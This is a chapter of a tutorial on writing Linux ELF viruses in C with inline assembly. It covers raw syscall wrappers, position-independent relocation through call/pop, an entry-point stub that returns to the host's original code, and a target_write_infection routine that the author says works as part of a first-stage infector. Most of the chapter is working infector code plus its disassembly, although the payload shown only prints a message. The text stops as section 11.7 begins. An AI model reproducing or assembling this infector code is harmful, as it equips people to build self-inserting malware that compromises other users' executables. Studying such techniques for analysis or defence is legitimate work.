11. Doing it in C

 

The C Programming Language - A language which combines the flexibility of assembly language with the power of assembly language.

 anonymous

In The language of evil I declared the code generated by gcc(1) to be unsuitable for a virus, and then rewrote the whole thing in assembly. A less drastic solution is to use inline assembly to correct only what's really necessary.

11.1. System calls

Have a look at the disassembly of function write in glibc. That code checks the return value of the system call and sets variable errno on error. We don't need this. Actually we can't access global variables at all. And Infection #1 does not care about the return code, anyway.

It is also remarkable that the code loads only the four required registers. The sources of glibc make great effort to provide optimal code for every case. I find the macros in glibc-2.2.4/sysdeps/unix/sysv/linux/i386/sysdep.h quite interesting.

For our needs a simple function will do. The line starting with a colon is an output constraint. "=a" (result) declares the value that eax has after the asm block to be the value of variable result. The following return statement would load the value of result into eax again, but fortunately gcc(1) optimizes this correctly. Of course the code would work without constraint and return. But the compiler would issue the warning "no return statement in function returning non-void".

Red Hat's gcc-2.96-98 produces weird code if the assembly statements are grouped in a single asm block. In that case mov ebp,esp is done not on function entry, but after the asm. See All together now for a disassembly. do_syscall is the last part.

Note that we can't name our function plain syscall. There is already such a declaration in unistd.h.

Source: src/doing_it_in_c/do_syscall.inc
#define write(fd, buf, count)	do_syscall(4, fd, buf, count)

int do_syscall(int number, ...)
{
  register int result;
  asm("push %ebx; push %esi; push %edi");
  asm(
    "mov 28(%%ebp),%%edi;"
    "mov 24(%%ebp),%%esi;"
    "mov 20(%%ebp),%%edx;"
    "mov 16(%%ebp),%%ecx;"
    "mov 12(%%ebp),%%ebx;"
    "mov  8(%%ebp),%%eax;"
    "int $0x80"
    : "=a" (result)
  );
  asm("pop %edi; pop %esi; pop %ebx");
  return result;
}
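
The effect of the output constraint is easier to see in isolation. The following is a minimal sketch, not part of the original sources: the function name value_from_eax and the constant 42 are made up for illustration, and the fallback branch exists only so the example compiles on targets other than x86.

```c
/* Returns the value that the asm block leaves in eax.
   value_from_eax is a hypothetical name used only in this sketch. */
int value_from_eax(void)
{
#if defined(__GNUC__) && (defined(__i386__) || defined(__x86_64__))
  int result;
  /* "=a" ties result to eax: whatever eax holds when the block
     ends becomes the value of result. Registers are written with
     a double percent sign because the block has operands. */
  __asm__ volatile ("movl $42, %%eax" : "=a" (result));
  return result;
#else
  /* Assumption: on other targets we skip inline assembly entirely. */
  return 42;
#endif
}
```

Without the constraint the compiler has no idea that the asm block produced anything, which is why do_syscall needs both the constraint and the return statement to compile without a warning.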

11.2. Position independent code

Previous examples needed a separate pass to build the insertable code. Output of the first pass is one chunk of bytes. The only interface to the infector is the place to patch with the original entry address (4 bytes at offset 1).

The crucial part is the lines in target_write_infection #1 (i) where we pass the address of the chunk of bytes to write(2). In a real virus these lines will also be part of the inserted code. The naive approach is to patch these instructions on infection. But this again leads to a two-pass process. The first pass is required to find the offsets to patch. A more comfortable approach is to make the code position independent by calculating absolute addresses at run-time. Note that option -fpic of gcc(1) does not help with the problem at all.

-fpic

Generate position-independent code (PIC) suitable for use in a shared library, if supported for the target machine. Such code accesses all constant addresses through a global offset table (GOT). The dynamic loader resolves the GOT entries when the program starts (the dynamic loader is not part of GCC; it is part of the operating system). If the GOT size for the linked executable exceeds a machine-specific maximum size, you get an error message from the linker indicating that -fpic does not work; in that case, recompile with -fPIC instead. (These maximums are 16k on the m88k, 8k on the Sparc, and 32k on the m68k and RS/6000. The 386 has no such limit.)

The instruction pointer is a register that holds the address of the next instruction to execute. Unlike "real" registers there is no direct way to retrieve its value. A call pushes the current value of IP onto the stack and adds a relative offset to it. Offset 0 just continues with the following instruction. And if that instruction is a pop we load the address of the pop instruction itself into a regular register.

In function get_relocate_ofs we compare the actual value of IP with the location the linker had in mind when it built the original executable. If code is executed at the exact location the linker gave it in the original file, then eax will be exactly the address of label delta after the pop. And the following sub instruction will then set eax to zero.

Source: src/doing_it_in_c/get_relocate_ofs.inc
int get_relocate_ofs(void)
{
  int result;
  __asm__(
    "call   delta         ;"
    "delta:                "
    "pop    %%eax         ;"
    "sub    $(delta),%%eax;"
    : "=a" (result)
  );
  return result;
}
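
The arithmetic behind the returned offset can be sketched in portable C, without any assembly. This is only a model under stated assumptions: the names relocate_ofs and relocated are hypothetical, and addresses are treated as plain 32-bit numbers as on i386.

```c
#include <stdint.h>

/* Difference between where a label really is at run time and where
   the linker assumed it would be. Unsigned arithmetic wraps around,
   so the result is also usable when the code moved to a lower
   address. */
uint32_t relocate_ofs(uint32_t runtime_addr, uint32_t linked_addr)
{
  return runtime_addr - linked_addr;
}

/* Correct any other link-time address by the same offset. */
uint32_t relocated(uint32_t linked_addr, uint32_t ofs)
{
  return linked_addr + ofs;
}
```

If the code runs where the linker put it, relocate_ofs yields zero and relocated returns its argument unchanged. If the same bytes run 0x1000 higher, every link-time address has to be corrected by 0x1000.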

A dump from gdb(1) is not enough to demonstrate this function. I want to show that the last four bytes of the call instruction, its relative offset, are really zero.

Command: src/doing_it_in_c/intel.sh
#!/bin/sh
file=${1:-${TEVWH_TMP}/doing_it_in_c/e3i2/infector}
func=${2:-get_relocate_ofs}
count=${3:-1}

[ -f "${file}" ] || exit 1
location=$(
	${TEVWH_PATH_NM} ${file} \
	| ${TEVWH_PATH_SED} -ne "/^[[:xdigit:]]* [tT] ${func}/s/ .*//p" \
	| ${TEVWH_PATH_TR} a-f A-F
)
[ -n "${location}" ] || exit 2
offset=$(
	${TEVWH_PATH_ECHO} "ibase=16; ${location} - ${TEVWH_ELF_BASE}" \
	| ${TEVWH_PATH_BC}
)
[ -n "${offset}" ] || exit 3
${TEVWH_PATH_NDISASM} -e ${offset} -o "0x${location}" -U ${file} \
| awk "{ print \$0; }
/ret/ && ++nr >= ${count} { exit 0; }"

Output: out/i386-redhat8.0-linux/doing_it_in_c/get_relocate_ofs.disasm
08048AC4  55                push ebp
08048AC5  89E5              mov ebp,esp
08048AC7  E800000000        call 0x8048acc
08048ACC  58                pop eax
08048ACD  2DCC8A0408        sub eax,0x8048acc
08048AD2  C9                leave
08048AD3  C3                ret
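
How a disassembler gets from the bytes E8 00 00 00 00 to "call 0x8048acc" can be checked by hand. The sketch below decodes a five byte i386 near call; the function name call_target is hypothetical, and returning 0 for any other opcode is a simplification chosen for this example.

```c
#include <stdint.h>

/* Target of a 5-byte i386 "call rel32" (opcode 0xE8) located at addr.
   The offset is stored little-endian and is relative to the address
   of the following instruction, that is addr + 5.
   Returns 0 if the bytes do not start with 0xE8. */
uint32_t call_target(uint32_t addr, const unsigned char insn[5])
{
  uint32_t rel;

  if (insn[0] != 0xE8)
    return 0;
  rel = (uint32_t)insn[1]
      | (uint32_t)insn[2] << 8
      | (uint32_t)insn[3] << 16
      | (uint32_t)insn[4] << 24;
  return addr + 5 + rel;
}
```

For the call at 08048AC7 the offset is zero, so the target is 08048AC7 + 5 = 08048ACC, the address of the pop.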

11.3. target_write_infection #2

We now have all parts to implement a position independent version of target_write_infection. This code works as part of a first stage infector. Output to prove it is at the end of this chapter. It should also work as part of an infection. But do you remember the paragraph about "exercise left to the reader"?

Compare this code with the first version, target_write_infection #1 (i). Instead of operating on a single variable, Infection #1, we write every byte between the start of infection and function end. The prototypes are required by the code of body. For reasons explained below, infection.inc and body.inc must lie next to each other. Anyway, the highlight of this chapter is the character constant msg.

Source: src/doing_it_in_c/write_infection.inc
int get_relocate_ofs(void);
int do_syscall(int, ...);
extern const char msg[];

#include "infection.inc"
#include "body.inc"
#include "get_relocate_ofs.inc"
#include "do_syscall.inc"

const char msg[] __attribute__ (( section(".text") )) =
  "ELF is dead baby, ELF is dead.\n";

void end() {}

bool target_write_infection(Target* t, size_t* code_size)
{
  enum { REST_OFS = ENTRY_POINT_OFS + sizeof(t->original_entry) };

  int ofs = get_relocate_ofs();
  char* r_begin = ofs + (char*)&infection;
  char* r_end = ofs + (char*)&end;
  unsigned size = r_end - r_begin;
  *code_size = size;

  TRACE_DEBUG(-1, "target_write_infection ENTRY_POINT_OFS=%d ofs=%d\n",
    ENTRY_POINT_OFS, ofs
  );

  /* i386: first byte is the opcode for "push" */
  CHECK_WRITE(r_begin, ENTRY_POINT_OFS);

  /* i386: next four bytes is the address to "ret" to */
  CHECK_WRITE(&t->original_entry, sizeof(t->original_entry));

  /* rest of infective code */
  CHECK_WRITE(r_begin + REST_OFS, size - REST_OFS);

  return true;
}

11.4. A section called .text

It is very difficult to persuade the linker to arrange object files in a specific order. But by putting all definitions into a single compilation unit (a .c that ends up in a .o) we are quite safe on that front. And though it is nowhere specified, most compilers will write definitions in the order they read them. So the "only" remaining problem is implementation specific classification of definitions. A small test program illustrates the problem.

Functions are ordered intuitively. However, constant data is put in a separate section called .rodata. And sections are ordered as a whole. See the section-to-segment mapping in the output of readelf(1) at Segments of /bin/tcsh.

I see a few approaches to the problem.

Anyway, the real problem is accessing these bytes in a position independent fashion. For code this is more or less the default. call and jmp work with relative offsets. Large contiguous switch blocks could get optimized into lookup tables, but this is easy to work around. Explicit function pointers can be corrected manually with get_relocate_ofs. The same could be done with items in virtual method tables. But then the table itself is accessed by compiler-generated code, which is hard to correct.

However, every data access requires explicit calculation through get_relocate_ofs. This includes innocent looking string literals. Basically you always have to look at the disassembly of your C code to be sure.

In our trivial example infection holds stub code written in assembler and is never accessed as data. Anyway, here is the documentation of gcc(1) on the issue.

section ("section-name")

Normally, the compiler places the objects it generates in sections like "data" and "bss". Sometimes, however, you need additional sections, or you need certain particular variables to appear in special sections, for example to map to special hardware. The "section" attribute specifies that a variable (or function) lives in a particular section.

11.5. The stub

This is the link between regular C code and the unsuspecting host. The requirements are:

Calculating the offset to patch with the original entry point definitely requires a separate pass. But good design can make this pass constant. We can use the same stub, with the same offset, for every kind of infective code.

The natural approach is to code the stub in a mixture of C and inline assembly and use ndisasm(1) to check the offset. This has the disadvantage of limited control. Functions compiled by gcc(1) are decorated with entry and exit code. The disassembly of The address of main is a fine example. I have no way to suppress the first two lines, push ebp and mov ebp,esp. Even worse, functions containing asm statements seem to defy all logic. Just see where mov ebp,esp is in the code of get_relocate_ofs. And I also don't see how to put code between pop ebp and ret. So we would have to build our own exit code using inline assembly. Basically a pop ebp and some kind of jmp. The exit code generated by gcc(1) would still be there, but just not used.

On the other hand the traditional way of mixing C and assembler code through separate .o files is not possible. Fortunately we have a tool that converts disassembly into a C style array constant: Dressing up binary code (i). This approach has one major problem, though. The assembly code is built independently of the C code. So the offset of the virus body (a plain C function) is not known during assembly of the stub. Patching the offset into the stub at run time is the obvious solution. Assuming a constant offset is the kind of black magic I prefer. But then my other hobby is selling innocent readers bull. The real motivation for the following hack is to recycle the framework from One step closer to the edge (i). There are a lot of possible variations.

The code below relies on proper alignment through the compiler. Because of the __attribute__ clause the character array infection starts at an address that is a multiple of 8. An assembler directive pads the stub with enough nop instructions to make its size a multiple of 8. Which means that any object placed after the infection is also aligned on a multiple of 8.

On i386 the largest built-in type of C compilers is double. And sizeof(double) is 8. So this number is typically the highest alignment used in a section. Another school of thought uses higher alignment to put data on cache line boundaries. And sections themselves are usually aligned on paragraphs (16 bytes), a term known since the days of real mode. But for our example there is no reason for compiler or assembler to insert padding bytes between infection and the following function, called body.
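
The padding rule is simple enough to check with a few lines of C. This is a sketch of the arithmetic only; the helper names padding_needed and padded_size are hypothetical and not part of the build.

```c
#include <stddef.h>

/* Number of filler bytes required to bring size up to the next
   multiple of align. Yields 0 if size is already a multiple. */
size_t padding_needed(size_t size, size_t align)
{
  return (align - size % align) % align;
}

/* Size of the object including its padding. */
size_t padded_size(size_t size, size_t align)
{
  return size + padding_needed(size, align);
}
```

The instructions of the stub, from push to ret, occupy 15 bytes. With an alignment of 8 that calls for a single nop, which puts the label body at offset 16 (0x10).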

Source: src/one_step_closer/i2/i386_Linux_intel.S
		BITS 32

start:		push	dword 0		; replace with original entry address
		pushf
		pusha
		call	body
		popa
		popf
		ret

		align 8
body:		push	byte start + 1	; dummy operation to specify offset

Output = Source: out/i386-redhat8.0-linux/one_step_closer/i2/infection.inc
const unsigned char infection[]
__attribute__ (( aligned(8), section(".text") )) =
{
  0x68,0x00,0x00,0x00,0x00,      /* 00000000: push dword 0x0         */
  0x9C,                          /* 00000005: pushf                  */
  0x60,                          /* 00000006: pusha                  */
  0xE8,0x04,0x00,0x00,0x00,      /* 00000007: call 0x10              */
  0x61,                          /* 0000000C: popa                   */
  0x9D,                          /* 0000000D: popf                   */
  0xC3,                          /* 0000000E: ret                    */
  0x90                           /* 0000000F: nop                    */
}; /* 18 bytes (0x12) */
enum { ENTRY_POINT_OFS = 0x1 };

11.6. All together now

The only missing piece is the actual infection body. We use another piece of magic, built-in functions. From the documentation of gcc(1):

GCC normally generates special code to handle certain built-in functions more efficiently; for instance, calls to alloca may become single instructions that adjust the stack directly, and calls to memcpy may become inline copy loops. The resulting code is often both smaller and faster, but since the function calls no longer appear as such, you cannot set a breakpoint on those calls, nor can you change the behavior of the functions by linking with a different library.

Currently, the functions affected include abort, abs, alloca, cos, cosf, cosl, exit, _exit, fabs, fabsf, fabsl, ffs, labs, memcmp, memcpy, memset, sin, sinf, sinl, sqrt, sqrtf, sqrtl, strcmp, strcpy and strlen.

Source: src/doing_it_in_c/body.inc
void body()
{
  int ofs = get_relocate_ofs();
  const char* r_msg = ofs + msg;
  do_syscall(4, 1, r_msg, strlen(r_msg));
}

And a disassembly, just to be sure. It consists of infection, body, get_relocate_ofs and do_syscall, in that order. This is not all inserted code. The character constant msg is not shown.

Output: out/i386-redhat8.0-linux/doing_it_in_c/e3i2.disasm
08048A80  6800000000        push dword 0x0
08048A85  9C                pushf
08048A86  60                pusha
08048A87  E804000000        call 0x8048a90
08048A8C  61                popa
08048A8D  9D                popf
08048A8E  C3                ret
08048A8F  90                nop
08048A90  55                push ebp
08048A91  89E5              mov ebp,esp
08048A93  57                push edi
08048A94  53                push ebx
08048A95  E82A000000        call 0x8048ac4
08048A9A  8D98008B0408      lea ebx,[eax+0x8048b00]
08048AA0  89DF              mov edi,ebx
08048AA2  FC                cld
08048AA3  B9FFFFFFFF        mov ecx,0xffffffff
08048AA8  B200              mov dl,0x0
08048AAA  88D0              mov al,dl
08048AAC  F2AE              repne scasb
08048AAE  F7D1              not ecx
08048AB0  49                dec ecx
08048AB1  51                push ecx
08048AB2  53                push ebx
08048AB3  6A01              push byte +0x1
08048AB5  6A04              push byte +0x4
08048AB7  E818000000        call 0x8048ad4
08048ABC  8D65F8            lea esp,[ebp-0x8]
08048ABF  5B                pop ebx
08048AC0  5F                pop edi
08048AC1  C9                leave
08048AC2  C3                ret
08048AC3  90                nop
08048AC4  55                push ebp
08048AC5  89E5              mov ebp,esp
08048AC7  E800000000        call 0x8048acc
08048ACC  58                pop eax
08048ACD  2DCC8A0408        sub eax,0x8048acc
08048AD2  C9                leave
08048AD3  C3                ret
08048AD4  55                push ebp
08048AD5  89E5              mov ebp,esp
08048AD7  53                push ebx
08048AD8  56                push esi
08048AD9  57                push edi
08048ADA  8B7D1C            mov edi,[ebp+0x1c]
08048ADD  8B7518            mov esi,[ebp+0x18]
08048AE0  8B5514            mov edx,[ebp+0x14]
08048AE3  8B4D10            mov ecx,[ebp+0x10]
08048AE6  8B5D0C            mov ebx,[ebp+0xc]
08048AE9  8B4508            mov eax,[ebp+0x8]
08048AEC  CD80              int 0x80
08048AEE  5F                pop edi
08048AEF  5E                pop esi
08048AF0  5B                pop ebx
08048AF1  C9                leave
08048AF2  C3                ret
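
The lines from 08048AA0 to 08048AB0 are the inlined strlen. What the sequence cld, repne scasb, not ecx, dec ecx computes can be modelled in plain C. The following is a sketch of the idiom, not code from the sources; the function name scasb_strlen is hypothetical and the variables are named after the registers they stand for.

```c
#include <stdint.h>

/* Model of the inlined strlen: count down from 0xffffffff while
   scanning for the terminating zero, then recover the length. */
uint32_t scasb_strlen(const char *s)
{
  uint32_t ecx = 0xffffffffu;   /* mov ecx,0xffffffff */
  const char *edi = s;          /* mov edi,ebx */

  /* repne scasb: compare, advance edi, decrement ecx, and stop
     after the byte that matched al (zero). */
  while (ecx != 0) {
    char c = *edi++;
    ecx--;
    if (c == 0)
      break;
  }
  ecx = ~ecx;                   /* not ecx: bytes scanned, incl. zero */
  ecx--;                        /* dec ecx: drop the terminating zero */
  return ecx;
}
```

For a string of n characters the loop touches n + 1 bytes, so ecx ends up as 0xffffffff - (n + 1). Inverting all bits gives n + 1, and the final decrement leaves n.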

11.7. Off we go again